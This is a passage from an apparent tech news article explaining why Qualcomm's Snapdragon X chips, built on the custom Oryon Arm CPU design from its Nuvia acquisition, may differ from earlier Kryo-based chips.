So why will Snapdragon X be any different? It's because these will be the first chips born of Qualcomm's acquisition of Nuvia in 2021. Nuvia was founded and staffed by quite a few key personnel from Apple's chipmaking operation, the team that had already upended a small corner of the x86 PC market by designing the Apple M1 and its offshoots. Apple had sued Nuvia co-founder and current Qualcomm engineering SVP Gerard Williams for poaching Apple employees, though the company dropped the suit without comment earlier this year. The most significant change from current Qualcomm chips will be a CPU architecture called Oryon, Qualcomm's first fully custom Arm CPU design since the original Kryo cores back in 2015. All subsequent versions of Kryo, from 2016 to now, have been tweaked versions of off-the-shelf Arm Cortex processors rather than fully custom designs. As we've seen in the M1 and M2, using a custom design with the same Arm instruction set gives chip designers the opportunity to boost performance for everyday workloads while still maintaining impressive power usage and battery life.